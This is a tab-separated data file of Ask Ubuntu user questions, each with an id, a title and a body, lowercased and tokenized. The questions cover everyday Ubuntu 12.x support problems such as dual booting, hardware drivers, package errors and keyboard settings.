260299	can i change user in the unity interface without having to type password when changing back ?	first of all , let me emphasize that i am talking about my home computer that i use for personal use . i have two accounts in ubuntu : one for me , one for my wife . we do n't use separate accounts to keep secrets from one another ( as far as i know ) , but we do like having separate internet cookies and application settings . ubuntu makes it convenient to switch from one user to the other without logging out , but the issue i have is that when i switch from my account to my wife 's account , the screen locks so that i must type my password again when switch back . how can i make it so that the screen does n't automatically lock under this circumstance ?
260303	how do i change the timezone on php5 for apache ?	ok i have a vps running ubuntu server 12.10 32bit and i need to set the timezone in my php.ini file so my php script 's time and date features will work ( i am trying to setup modx ) i have tried to go to /etc/php5 and change it in different files and it wo n't work . how do i change php 's timezone . also everything in the .ini file has a ; in front of it is that a comment or what ? also i forgot to mention that my webserver in installed via tasksel as lamp .
260305	problem installing ubuntu 12.10	my screen turns black after choose `` try ubuntu without installing '' i have a lenovo ideapad y400 , also do the same in a friend laptop and work perfectly .
260311	12.04 kernel still on 3.2 ?	i heard news that the 12.04 kernel will be upgraded to version 3.4 , but it 's still kernel 3.2 for me and according to ubuntuupdates.org uname -r 3.2.0-38-generic ubuntuupdates.org package search for linux-image does it only come on newly installed systems or have they just not packaged it yet ?
260313	ubuntu on mac mini ( late 2012 )	i installed ubuntu on my late 2012 mac mini , but now i ca n't find/install the correct wifi/ethernet driver . does anyone have a link to the correct driver and how to install it ? thanks ! the network devices on this machine are : broadcom corporation device [ 14e4:1686 ] ( rev 01 ) with manually compiled kernel driver tg3 broadcom corporation bcm4331 [ 14e4:4331 ] ( rev 02 ) with kernel driver bcma-pci-bridge
260314	when i try to install ubuntu 12.10 from a disk , the install crashes	i 'm trying to run ubuntu 12.10 alongside windows 7 , so that if one os crashes i have a backup . my machine is 64 bit intel celeron , i think 900ghz . whenever i selected `` install ubuntu '' from the dvd options at startup and got to the page where it said `` run alongside windows '' and `` replace windows . '' whenever i select `` run alongside windows , '' the screen flashes black , shows the ubuntu starting up/shutting down screen , and the progress bar does not move . after a couple minutes of not doing anything , the disk ejects . what exactly is happening to cause this ? -many thanks in advance !
260316	unable to open cd	i have just moved from windows to ubuntu . before i uninstalled windows i put some documents that i needed on a cd . once i had installed ubuntu i put the cd in to get the files back . but all i get is the message ... error mounting /dev/sr0 at /media/chris/udf volume : command-line `mount -t `` udf '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , iocharset=utf8 , umask=0077 '' `` /dev/sr0 '' `` /media/chris/udf volume '' ' exited with non-zero exit status 32 : mount : block device /dev/sr0 is write-protected , mounting read-only mount : wrong fs type , bad option , bad superblock on /dev/sr0 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so people are not going to migrate from windows if ubuntu ca n't even do a simple task like open a cd without this meaningless error message .
260317	ubuntu dualboot installation process - resizing partition	i decided to have ubuntu to dualboot with win7 . i have read couple of guides , and it seems that i still ca n't get this right . atm i have my laptop running the ubuntu cd , i picked in installation type - `` something else '' and i have 3 partitions ( on the same hd ) : the 100mb for windows 60gb of windows 458gb of data i want to resize the data partition to 424gb , so i will have 24gb for ubuntu ( 20gb ) + swap ( 4gb ) . i pick the 458gb partition and click change , and is says '' new partition size in megabytes textbox '' now what am i supposed to do so it 'll be 20gb for ubuntu and 4gb swap ? this 1 ) one time write `` 20000 '' and then change again and write `` 4000 '' or 2 ) write `` 424000 '' to have unallocated space of 24gb ? thanks in advance !
260331	'ubuntu for tablets ' -- when available ?	when will the tablet version of ubuntu ( not desktop ) be able to be installed on a nexus 7 . i do not think it can now ( since i do not even think they have finished it ) but if so , post a tutorial .
260332	md + luks + lvm will not cleanly shutdown	my setup is currently raid1 + luks on each md partition and lvm on top to stripe between the arrays . there is only one volume group with one logical volume currently . sdc 8:32 0 1.8t 0 disk └─sdc1 8:33 0 1.8t 0 part └─md127 9:127 0 1.8t 0 raid1 └─data-crypt0 ( dm-3 ) 252:3 0 1.8t 0 crypt └─data_raid-data ( dm-5 ) 252:5 0 2.7t 0 lvm /mnt/data sdd 8:48 0 931.5g 0 disk └─sdd1 8:49 0 931.5g 0 part └─md126 9:126 0 931.4g 0 raid1 └─data-crypt1 ( dm-4 ) 252:4 0 931.4g 0 crypt └─data_raid-data ( dm-5 ) 252:5 0 2.7t 0 lvm /mnt/data i 'm able to startup the device via cryptsetup luksopen /dev/md/data:0 data-crypt0 # decrypt cryptsetup luksopen /dev/md/data:1 data-crypt1 # decrypt vgchange -ay /dev/data_raid # turn on lvm mount /dev/data_raid/data /mnt/data # mount unfortunately i 'm unable to go the opposite direction and turn the thing off . umount /mnt/data # ok vgchange -an /dev/data_raid # ok cryptsetup luksclose data-crypt0 # fail for some reason i see the following , several times , and the device does not shut down . device-mapper : remove ioctl on data-crypt0 failed : device or resource busy this is after a reboot and all i have done is the commands i 've shown without ever using any of the data on the partition . i 'd like some suggestions if anyone has something on either the setup or how to get it to shutdown .
260335	wired ethernet on a mac mini 2012 with ubuntu 12.10 problem	i have a issue with a late mac mini 6.1 2012 ubuntu : 12.10 kernel : 3.5.0-25 generic lspci -nnk | grep -i net -a3 : 00:1f.3 smbus [ 0c05 ] : intel corporation 7 series/c210 series chipset family smbus controller [ 8086:1e22 ] ( rev 04 ) subsystem : intel corporation device [ 8086:7270 ] kernel modules : i2c-i801 01:00.0 ethernet controller [ 0200 ] : broadcom corporation netxtreme bcm57766 gigabit ethernet pcie [ 14e4:1686 ] ( rev 01 ) subsystem : broadcom corporation netxtreme bcm57766 gigabit ethernet pcie [ 14e4:1686 ] 01:00.1 sd host controller [ 0805 ] : broadcom corporation netxtreme bcm57765 memory card reader [ 14e4:16bc ] ( rev 01 ) subsystem : broadcom corporation device [ 14e4:0000 ] kernel driver in use : sdhci-pci kernel modules : sdhci-pci 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4331 802.11a/b/g/n [ 14e4:4331 ] ( rev 02 ) subsystem : apple inc. device [ 106b:010e ] kernel driver in use : bcma-pci-bridge kernel modules : bcma i cant get wired to work but my wifi works after a install of this package packages.ubuntu.com/quantal/all/linux-firmware-nonfree/downloadu . , now i need to figure out how to get the wired to work . but i will come and ask about that if i cant find any post about it .
260336	where can i find the startup applications in 12.10	i 'm using 12.10 and am looking for where i can configure the startup applications . i 've read that i can find it in system > preferences > startup applications , but that seems to be in a previous version of ubuntu . i do n't have a system , the closest thing i can find is system settings , but it has no preferences . i also do not see it here : startup applications missing from system settings screen . where can i find it ? i 'm trying to set pidgin to load on startup , i also do not know it 's install path .
260337	dell vostro 3350 w/intel core i7-2640m 2,8ghz	i am considering purchasing a dell vostro 3350 w/intel core i7-2640m 2,8ghz . i have searched and found that this laptop has a hybrid graphics system , but i have been unable to determine what the exact status is on this issue . can i safely purchase this computer and successfully get ubuntu installed ?
260338	integrated webcam issues lenovo t430u ubuntu 12.10	i am fairly new user to ubuntu . i have a fresh install of 64 bit ubuntu 12.10 with the gnome remix . the laptop is lenovo thinkpad t430u . the issue is my integrated laptop webcam is not working with skype and cheese . lsusb gives bus 003 device 002 : id 04f2 : b327 chicony electronics co. , ltd as the webcam identifies . with guvcview the camera works ( poor choppy video quality ) . i installed skype from the skype webpage and used the mixed architecture 12.04 download . i hope some one can provide a solution ! will be glad to give more info if needed ! i know there are a lot of similar questions on askubuntu but in my case the webcam seems to be identified and works with one software . moreover i had a previous 12.04 installation of ubuntu where skype video worked like a charm on the very same machine !
260341	create ubuntu theme with pure html/js/css	i 'm wondering if someone can point me in the right direction for creating an ubuntu theme using pure html/css/js . i 'm hoping there is some existing back-end to gnome3 or unity i can simply install and create my theme as easily as i 'd create a website . p.s . : if there is no such way to create a theme or add to the default theme , then alternatively if you can , please give me some details about what systems/libraries i 'd have to hook into or extend . i 'm a c++ developer so i suppose if i really have to , i can make this possible . hoping though that something already exists . thanks for your help !
260345	can someone make this modx .htaccess file work for me ? i am trying to make friendly urls work	i now have my modx install working but am unsure how to edit my htaccess file so my friendly urls ( trying to alias pages ) can anyone help ? if you can a copy of my htaccess can be found at http : //pastebin.com/7bawd2pw ps- my website url is http : //www.nsuchy.tk/ and want nsuchy.tk to redirect to www.nsuchy.tk
260346	why does n't the ubuntu installer notice my existing ubuntu installation ?	yesterday i downloaded ubuntu 12.10 and i installed it along side my windows xp installation . then since it was running slow , i decided to remove xp . i decided to do a fresh install of ubuntu via usb . so when i was installing it , it detected that my pc has a windows xp installation , but it did n't show that i already have ubuntu or anything like that . should i continue just by formatting windows xp or should i do something else ?
260349	smplayer does n't work with vdpau ?	i recently bought a nvidia gt 440 , and installed the proprietary nvidia-experimental-310 driver . every player seems to be working alright with vdpau , except mplayer frontends like smplayer . any ideas on why this is happening ?
260350	wubi 's ubuntu files	can i access to wubi 's files from windows ? i saved a few files on my ubuntu desktop and i 'd like to access them even when i 'm running windows . any help ?
260351	is bumblebee installed incorrectly ?	i have a dell inspiron n7110 running ubuntu 12.10 . i followed the instructions to install ubuntu & bumblebee on my computer in this thread from the user mikrus : http : //ubuntuforums.org/showthread.php ? p=11647449 now i have vmware workstation installed and i 'd like to enable 3d acceleration on my virtual machines . in order to do so though i have to install primus but i know that i need bumblebee fully working first since primus works with that . unfortunately though when i run in a terminal : optirun glxspheres i get : [ 210.844645 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) nvidia ( 0 ) : failed to initialize the nvidia gpu at pci:1:0:0 . please [ 210.844683 ] [ error ] aborting because fallback start is disabled . does this mean bumblebee is installed incorrectly ? and if so ( or if something else is installed incorrectly ) , how do i fix it ?
260353	segmentation fault when using su or sudo	example of the problem : $ su segmentation fault $ sudo ls segmentation fault i tried to compile sqlite3 from source earlier . i do n't know what libraries it installed . this may be the reason why this is happening . i tried strace su and it ends with the following : ... fstat64 ( 6 , { st_mode=s_ifreg|0644 , st_size=17964 , ... } ) = 0 mmap2 ( null , 20788 , prot_read|prot_exec , map_private|map_denywrite , 6 , 0 ) = 0xb7295000 mmap2 ( 0xb7299000 , 8192 , prot_read|prot_write , map_private|map_fixed|map_denywrite , 6 , 0x3 ) = 0xb7299000 close ( 6 ) = 0 mprotect ( 0xb7299000 , 4096 , prot_read ) = 0 mprotect ( 0xb72f9000 , 4096 , prot_read ) = 0 set_tid_address ( 0xb758a728 ) = 11144 -- - sigsegv ( segmentation fault ) @ 0 ( 0 ) -- - +++ killed by sigsegv ( core dumped ) +++ segmentation fault ( core dumped ) when i try gdb su and try to run , it gives me can not find new threads : generic error . i looked online for a solution to the problem , encountered this thread , and then tried running ld_preload=/lib/i386-linux-gnu/libpthread.so.0 gdb su ( as suggested in the thread ) . when i then tried to run it again , it gave me the same error . based on the strace , i think there is some problem with how it 's threading , but i have no idea how to fix this . is there some way to reinstall the basic bash utilities ? here 's more information about my system : $ uname -a myhost 3.2.0-37-generic-pae # 58-ubuntu smp thu jan 24 15:51:02 utc 2013 i686 i686 i386 gnu/linux ( i 'm pretty sure the hardware is 64bit )
260359	shotwell ca n't export to picasa -- 401 unauthorized	publishing to picasa results in the following error https : //www.googleapis.com/oauth2/v1/userinfo returned http status code 401 unauthorized my `` online accounts '' in the `` system settings '' return no error and show that i seem to be connected to my account .
260361	how to resolve `` the installation or removal of a software package failed '' ?	i am unable to update or install or even uninstall things lately . this is what it shows me ... installarchives ( ) failed : preconfiguring packages ... adding user solik to group netdev preconfiguring packages ... preconfiguring packages ... preconfiguring packages ... selecting previously unselected package python-wicd . ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 305977 files and directories currently installed . ) unpacking python-wicd ( from ... /python-wicd_1.7.2.4-2ubuntu1_all.deb ) ... selecting previously unselected package wicd-daemon . unpacking wicd-daemon ( from ... /wicd-daemon_1.7.2.4-2ubuntu1_all.deb ) ... selecting previously unselected package wicd-gtk . unpacking wicd-gtk ( from ... /wicd-gtk_1.7.2.4-2ubuntu1_all.deb ) ... selecting previously unselected package wicd . unpacking wicd ( from ... /wicd_1.7.2.4-2ubuntu1_all.deb ) ... processing triggers for man-db ... processing triggers for ureadahead ... ureadahead will be reprofiled on next reboot processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for hicolor-icon-theme ... setting up ushare ( 1.1a-0ubuntu9 ) ... /var/lib/dpkg/info/ushare.config : 26 : /etc/ushare.conf : string : not found dpkg : error processing ushare ( -- configure ) : subprocess installed post-installation script returned error exit status 127 setting up python-wicd ( 1.7.2.4-2ubuntu1 ) ... no apport report written because maxreports is reached already setting up wicd-daemon ( 1.7.2.4-2ubuntu1 ) ... * starting network connection manager wicd ... done . processing triggers for ureadahead ... setting up wicd-gtk ( 1.7.2.4-2ubuntu1 ) ... setting up wicd ( 1.7.2.4-2ubuntu1 ) ... errors were encountered while processing : ushare error in function : setting up ushare ( 1.1a-0ubuntu9 ) ... /var/lib/dpkg/info/ushare.config : 26 : /etc/ushare.conf : string : not found dpkg : error processing ushare ( -- configure ) : subprocess installed post-installation script returned error exit status 127 how do i resolve this ?
260362	ubuntu after copy files owner changes	when i copy my files from development to production /var/www the owner and permission of the files copied changed . what are the perimission/owner of the files in /var/www so that it is not a security risk ? what would be the command to change the files to the proper owner/permission of files in /var/www ? thanks
260363	how to remap capslock to ctrl in xubuntu 12.04 ?	i tried doing it like follows ( in autostart ) : setxkbmap -option `` ctrl : nocaps '' and it works , but only for a while - then the setting is reset back to original state . how can i make it persistent ? i use xfce4-xkb-plugin as my input language switcher , but it does n't seem to have an option to set caps key function .
260374	google calender evolution sync no longer working	one of my favorite unity features is when you click the date-time indicator it tells you upcoming events in your calender . i have evolution set up to sync with my google calender . i recently changed my google password and now when i click the indicator my upcoming events no longer show up . i opened up evolution in order to change the password but now it takes approx . 3 mins to start up and when it does it freezes and i have to force quit it . is there anyway to change the settings via some other application ?
260376	unattended install without swap	i 'm following the instructions at how do i create completely unattended install for ubuntu ? to create an unattended install . this will be installed on a vm , so i would like to disable swap . if i just create the kickstart file without any mention of swap , after completing the file system step , it stalls on a screen asking whether i 'm sure i want to continue without swap and i have to confirm this . is there any way to disable swap in the method i 'm using ? if not , is there a different recommended method for unattended installs ? thanks ,
260381	why wo n't steam start after a recent update ?	i 'm running steam for linux ( native , not wine ) on ubuntu 12.10 32 bits . since the last steam update , it does n't work anymore . instead of starting , it pops a terminal claiming that it needs to install an additional package . unfortunately , the operation does n't work . here 's the output : steam needs to install these additional packages : steam-launcher [ sudo ] password for tvuillemin : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package steam-launcher press return to continue : my os is up-to-date . i tried to reinstall steam both from the ubuntu software center and from the steam website , but i got precisely the same error . i also looked for a repository with this package , but i did n't find anything relevant . any clue ? thanks in advance .
260382	dual booting windows server 2012 and ubuntu 12.10	i have a server i use for testing that currently has server 2012 standard . i need to do some testing with openldap so i shrunk the disk to have 500gb of free space and installed ubuntu on it . unfortunately when the restart phase occurred , the computer booted straight into server 2012 without grub coming up and giving me the option to choose . is there a conflict between grub and the latest line of windows operating systems ? or am i just doing something wrong ? ( i did make sure to put the boot loader onto the ubuntu install partition instead of the install partition , as i have done in the past )
260385	ubuntu 12.10 cant resolve characters inside firefox searchbar for google , youtube ?	when i type inside the search bar in youtube or google , the letters typed are not displayed although the characters are being recognised by the engine and produce autocomplete results that are visible . i did download a fresh copy of ff via sudo apt-get firefox reinstall as suggested but this unfortunately did not work . the search pane for google in the top most header to the left address bar does in fact show the characters as bold . with firefox in safe mode , the problem is corrected
260386	google-chrome starts a new session when i click a link	when i click a link in a terminal window ( like when i 'm using trn or mutt ) or in the quassel irc client , instead of creating a new window or tab in the existing google chrome session , it creates a new instance of chrome . and even if i shut that one down first , it sort of `` takes over '' so if i shutdown chrome or log out and log back in , the `` continue where i left off '' on startup option means i only see the one link , instead of all the tabs i had open before . is there something i can configure to make those applications use the existing chrome instance instead of starting a new one ? ( this is kubuntu 12.10 ) update : it appears this behaviour , of starting a new session instead of using the existing one , only happens when it restarts chrome after i log off and back in . if i start chrome from the menu button , all works correctly and links clicked in konsole or quassel open up in new tabs on existing windows .
260387	permanently configuring windows to ignore alt	i use blender a lot ( not as much as i used to but still heavily at times ) . it relies on utilizing the alt key to move around within a scene . unity uses alt to grab windows and allow you to move them with your mouse . since unity trumps blender you can guess which program gets the alt key . so every now and then i have to go into compiz and change the settings for moving a window from alt to some other key . it turns out that it 's only temporary and after updates or even for no reason sometimes the system will return to using alt to move windows around . is there a way to permanently change the key which moves a window ?
260390	downloading software from internet	i need to download a file from this site . i saved the file elements as linux 64.bit into a temp folder in my desktop . how do i get these files from my temp desktop folder to its final destination so i can use this new software i just purchased ? i 'm using ubuntu 12.04
260395	listview subtitled delegate , icon size and title word wrapping ?	i 'm working on an ubuntu mobile app and i have a few questions about customizing a listview . the listitem may contain an icon , but will have a title and subtitle . what i 'm having trouble with is that the thumbnail is pulled from the internet and i want to limit it 's height and width . also , the title does n't wrap if it 's too long instead it just truncates and adds `` ... '' at the end . thanks .
260396	update-initramfs is stuck	today i wanted to install virtualbox ( 4.2 ) in ubuntu 12.10 and went to the software center . after clicking on the 'install ' button in the usc virtualbox was being downloaded and installed . i waited more than five minutes but nothing happened , and the progress bar did n't change . after about one hour of waiting i closed the usc and rebooted the pc . now i have got the problem that whenever i want to install software via sudo apt-get install < software > i get the following error : quantal @ flubuntu : ~ $ sudo apt-get install < whatever-package > e : could not get lock /var/lib/dpkg/lock - open ( 11 resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? after killing dpkg in terminal ( sudo killall dpkg ) or rebooting i get the next error : quantal @ flubuntu : ~ $ sudo apt-get install < whatever-package > e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct and when i try to execute sudo dpkg -- configure -a the command hangs at update-initramfs : generating /boot/initrd.img-3.5.0-25-generic when i start sudo update-initramfs -k all -u -v in verbose mode it says that it adds many modules , binaries and firmware ( which i have not included in the output ) but then is stuck after the following six lines : adding binary /lib/firmware/radeon/tahiti_me.bin adding firmware radeon/tahiti_me.bin adding binary /lib/firmware/radeon/tahiti_pfp.bin adding firmware radeon/tahiti_pfp.bin adding module /lib/modules/3.5.0-23-generic/kernel/drivers/gpu/drm/i2c/sil164.ko adding module /lib/modules/3.5.0-23-generic/kernel/drivers/gpu/drm/i2c/ch7006.ko blacklisting ch7006 or the module before does n't work ; i have also tried to manually rename ch7006.ko and sil164.ko ( after checking that it is n't necessary for the system ) but then it is stuck at the line before . many thanks in advance ! further information : note : when booting ubuntu i get no errors or so , so the kernel boots but i can not update it ( and apt-get install does n't want to install software as long as this problem exists ) . the output of uname -a : linux flubuntu 3.5.0-23-generic # 35-ubuntu smp thu jan 24 13:15:40 utc 2013 x86_64 x86_64 x86_64 gnu/linux
260397	`` sudo bash '' ignoring read-only permission of .bash_history file	this problem is in an up-to-date 12.04 , and seems to have started recently . i have my .bash_history file set to read only . lately i 've noticed that despite this the file is being modified ! here 's the scenario . in a new terminal , here is the tail of the file : $ tail -5 .bash_history mkdir -p ttt ; gs -dnopause -sdevice=png16m -r180 -soutputfile=ttt/p % 03d.png *.pdf rsync -av /home/u1204 /media/seagate/u1204 gnote.late.reminders|grep_color='1 ; 32 ' egrep -i `` is overdue '' pvr_iplayer -x -hd /home/u1204/documents/pvr/tv-hd ; pvr_iplayer -x -std /home/u1204/documents/pvr/tv-std exit open a shell with raised privileges $ sudo bash [ sudo ] password for u1204 : # ls -l ~/.bash_history -r -- -- -- -- 1 u1204 u1204 1266 feb 23 19:52 /home/u1204/.bash_history so .bash_history is still definitely read-only . do something , then exit the escalated shell : # echo `` written to history file '' written to history file # exit exit and voilă , the history file has been modified ! $ ls -l ~/.bash_history -r -- -- -- -- 1 u1204 u1204 1324 feb 23 20:10 /home/u1204/.bash_history open another terminal to confirm : $ tail -5 .bash_history pvr_iplayer -x -hd /home/u1204/documents/pvr/tv-hd ; pvr_iplayer -x -std /home/u1204/documents/pvr/tv-std exit ls -l ~/.bash_history echo `` written to history file '' exit i 'm pretty sure that it did n't used to do this ( in 10.04 at least ) . anyway , this ca n't be correct behaviour , can it ?
260404	super key shortcuts `` unresponsive '' when configured via custom shortcuts	when i set custom shortcuts from keyboard / shortcuts / custom shortcuts , all of the ones set to use super key ( e.g . super + 1 , set to open a text file using the default text editor ) have a weird threshold between key presses . if super is released too quickly , the shortcut is not registered . in practice , it requires , what i would call , an abnormally long press . if i set up exactly same keys via commands plugin in compiz , the unresponsiveness is gone . what causes this behaviour ? can the the `` threshold '' be changed from somewhere ? does this happen on purpose - to give priority to the default super key shortcuts in unity ? additional information : ubuntu 12.10 seems to affect only super key ( at least i have not noticed the same on other keys ) super key is not assigned to show the launcher ( i 've changed it to super + a , but it seems to make no difference whether super is used ) the command or key combination does not matter , except possibly if additionally ctrl , shift or alt are used ( e.g . ctrl+super+1 ) , but i am not 100 % sure about this , because it is hard to test this consistently as the difference is only in milliseconds i do not want use compiz / commands , because the plugin only allows 20 commands ( why is there such restriction in the first place ? ! ) and setting up them in there is much more troublesome .
260416	making bootable usb in mac os 9 ?	so i have an old g3 imac with mac os 9.2 and mac os 10.1.5 installed on it . i would like to use this computer to make a bootable ubuntu usb stick . however when i followed the instructions for using terminal in os x , it did not work.i dont know if the computer is just too old . i am new to linux . is there any way that i can use this computer to create a bootable usb ?
260424	ubuntu freezes when loading from cd or usb	i am trying to dual boot from my 2008 macbook pro running lion 10.7.5 the installation gets stuck on the shaders when loading , so i have tried : burning another ubuntu 12.1 cd running ubuntu via usb running the cd integrity checker on ubuntu obviously it 's more of a hardware/driver issue at this point . any solutions ?
260428	how to take the first n files from a directory with a letter in alphabetical order to another directory	i need to take the first 3 files from a directory starting with letter b in alphabetical order to another directory . i 've come up with this command : find /users/students/ejackson/a3-ejackson-55688-114906/cs282in \ -name `` b* '' | sort | head -3 and it produces the proper files , but i ca n't do anything with them . ideally i 'd just pipe the output of the above command to mv , but i do n't think that 's possible . i 've been messing around with this for hours , but i 've gotten nowhere . any help is much appreciated . p.s . i have to do this without grep , sed or awk .
260430	intel g630 processor suitability	i have a computer with an intel 630 processor , 4gig ram and 500 gb hard drive . would this machine be able to run ubuntu alongside windows 8 ? i am also thinking of starting an internet cafăš initially with 10 computers . would i have to buy the ubuntu cd for each machine or would one cd suffice ?
260436	ubuntu windows installer , no boot option	hi i 've downloaded and ran the wubi but when it ask me to reboot i do , but it just boots up window xp . i do n't get any option to select ubuntu . does anyone have any ideas ?
260446	finch : how to remap modkey to ctrl	i am desperately trying to remap the default mod-key ( alt ) to ctrl or super using finch . what to add to .gntrc for this ? thanks in advance !
260453	switching keyboard layout and shortcuts	first of all sorry if this question was already asked but mine is not how to add a shortcut for switching keyboard layout i often switch from french to us keyboard and the usual key shortcut for application keep on being as if it was french . is it possible that the application ( kile is an open application with which i have pb ) follows the shortcut of the us keyboard when i 'm using us keyboard layout and french when i 'm in french ? example ctrl+a ( select all ) becomes ctrl+q ( quit ) , so if i 'm using us keyboard and do ctrl+a to select all the application closes interpreting ctrl+q ... . a bit annoying thanks
260457	secure boot error on lenovo z475	i ca n't seem to install ubuntu 12.10-desktop-amd64 to my computer . i 've written the install to my memory stick but it flashed secure boot error really fast then sits on the grub screen .
260461	pygtk changing theme for popup menu	i spent few hours searching on google and i gave up now ... i need to change background for popup menu in my app . it set to whatever system default theme is ... and i need this to be set to radiance for all the time . any ideas how to achieve this ?
260464	wifi randomly turning off `` via hardware switch ''	my network card uses a 'realtek rtl8187b chipset ' . the issue is , after about 30 minutes of working , the wifi turns off , and dmesg says : turned off via hardware switch turning the actual switch [ off ] and [ on ] again does n't change anything , and rfkill list all shows the device as hard blocked . if i do rmmod rtl8187 and then modprobe rtl8187 , dmesg shows : rtl8187 : wireless switch is on ieee80211 phy1 : eeprom reset timeout ! , addrconf ( netdev_up ) : wlan0 : link is not ready the 'nm-applet ' shows the device as not ready . sometimes i manage to turn it up , by using ifconfig wlan0 up , sometimes it does n't work . sometimes the iwlist scan succeeds , sometimes it shows nothing and whenever i manage to connect , after about 30 minutes i 'm back to square one . if i 'm particularly unlucky , the card does n't start at all , and instead it spams my dmesg from the system start by unable to enumerate usb device messages . everything seems to happen more or less randomly . can it be a problem with my drivers ; rtl8187 3.2.0-29-generic or is the card faulty ?
260467	partition : read error	my laptop came to a grinding halt . on reboot , i got grub , which failed to load linus . i managed to get an initramfs prompt once but no further that way . using linuxlive usb creator and a ubuntu-12.04.2-desktop-i386.iso on a usb stick , i managed to boot , but the original partition does n't seem to be there any more . sudo fdisk -l lists /dev/sdc1 , which is the usb drive , but nothing else though sudo fdisk -s /dev/sda returns 312571224 . ( i 'd expect there to be a sda1 ( linux ) , sda2 ( extended ) , and sda5 ( linux swap ) i installed testdisk and sudo testdisk /list shows disk /dev/sda - 320 gb / 298 gib - chs 38913 255 63 partition start end size in sectors partition : read error and running testdisk 's search returns no partitions but also says read error for everything while doing analysis . sudo dumpe2fs /dev/sda returns dumpe2fs : attempt to read block from filesystem resulted in short read while trying to open /dev/sda could n't find valid filesystem superblock sudo sfdisk -l /dev/sda says disk /dev/sda : 38913 cylinders , 255 heads , 63 sectors/track read : input/output error sfdisk : read error on /dev/sda - can not read sector 0 /dev/sda : unrecogonized partition table type no partitions found sudo gparted says input/output error during read on /dev/sda ** ( gpartedbin:18653 ) : warning ** : could not connect : connection refused and only the usb stick shows up in the gui . sudo mke2fs -n /dev/sda1 then sudo e2fsck -f -b 32768 /dev/sda1 e2fsck : attempt to read block from filesystem resulted in short read while trying to open /dev/sda1 could this be a zero-length partition ? i presume there are bad sectors somehow ate the partition record in some way , but i do n't know what else to try . is there anything i can do to get the disk back ? ( it would be nice to get the data back too but everything important is already backed up elsewhere so , while it would be convenient , it 's not actually necessary . )
260471	cuál versión ( 32 o 64 bits ) de ubuntu instalar con este procesador ?	english : hello to all ! this is the first time i have a question here . i 'm going to partition my hard drive and install ubuntu 12.04 with my windows 7 , the detail is that i have this processor : amd athlon ii p360 2.30 ghz dual core processor , and i have doubts if i must install the 64-bit version of ubuntu , and with the 32 i have had performance problems , such as mouse and i have to start laguea ubuntu in 2d mode . do not know what i mean , what should i install ? i did not find much information on my processor . thank you ! original : qué tal a todos ! ! ! esta es la primera vez que hago una pregunta aquí . voy a particionar mi disco duro e instalar ubuntu 12.04 junto con mi windows 7 , el detalle es que tengo este procesador : amd athlon ii p360 dual core processor 2.30 ghz , y tengo la duda si deberé instalar la versión de 64 bits de ubuntu , ya que con la de 32 he tenido problemas de rendimiento , por ejemplo el mouse se laguea y tengo que iniciar ubuntu en modo 2d . no sé si me explico , cuál debería instalar ? no encontré mucha información sobre mi procesador . gracias !
260474	ubuntu 12.10 grahical issues when dual booting with os x , mac os x left unbootable	i have been trying to dual boot os x and ubuntu on my macbook pro 7,1 and have found a few issues . first of all , i am using this guide . http : //lifehacker.com/5934942/how-to-dual-boot-linux-on-your-mac-and-take-back-your-powerhouse-apple-hardware i have just installed ubuntu and rebooted . i saw grub instead of refit . when selecting ubuntu and logging in , i get graphical glitches . the glitches vary , and sometimes i get one before i hit the login screen . when i try to boot os x i get this : however , i can get a terminal working nice ! so , my questions are : how do i get ubuntu to work without graphic issues and how can i get os x to boot again and preferably use refit as the guide intended to boot the 2 ? quick update : i have successfully booted os x 10.8 ! i held option when starting , selected my os x hard drive and from there it started refit . i selected os x and it booted as normal ! now i just need ubuntu to work correctly . update 2 : refit now appears on startup , and the only issues is the ubuntu graphics . if i can get unity to start correctly , and all the graphics to be displayed nicely , i 'll be good . yay , progress ! update 3 : in the process of reinstalling ubuntu .
260477	backup ubuntu ( or any linux ) software configuration	i 'm sure for the linux pros out there there is a really obvious way of doing this , but is there an easy way to backup an ubuntu software configuration , essentially as a distribution ? to clarify , i just installed ubuntu 12.10 on my laptop . i went through a ton of updates , installed a bunch of software , configured some settings , etc. , and i would like to essentially `` store '' this configuration essentially giving me an image that i could use to restore the computer to the same point if i needed to . while i know i can just dump the contents of the disk , i wanted it to be a bit hardware agnostic so if i needed to i could install onto different hardware ( perhaps replicating the setup on a different pc ) . i think what i am looking for is a way to take my current configuration and turn it into a custom distribution , but i 'm not sure of an easy way to do this that will retain all my updates and configurations . i imagine there is probably an easy way though since this kind of replication seems like it 'd be common in it use . edit : as additional clarification , the backup can not require an internet connection to work ( i.e . all the packages , updates , and configurations should be stored with the backup ) and it should not be tied to a specific hardware configuration ( so i do n't think a direct disk image clone will work ) . any ideas ?
260478	how to install arduino-1.0.3-linux32.tgz ?	ca n't ./configure after i tar'ed linux version from here : http : //arduino.cc/en/main/software
260480	installing ubuntu from windows	i am trying to install ubunto with the windows installer but i want to make the partition larger than 30 gb . how do i do this ? thank you .
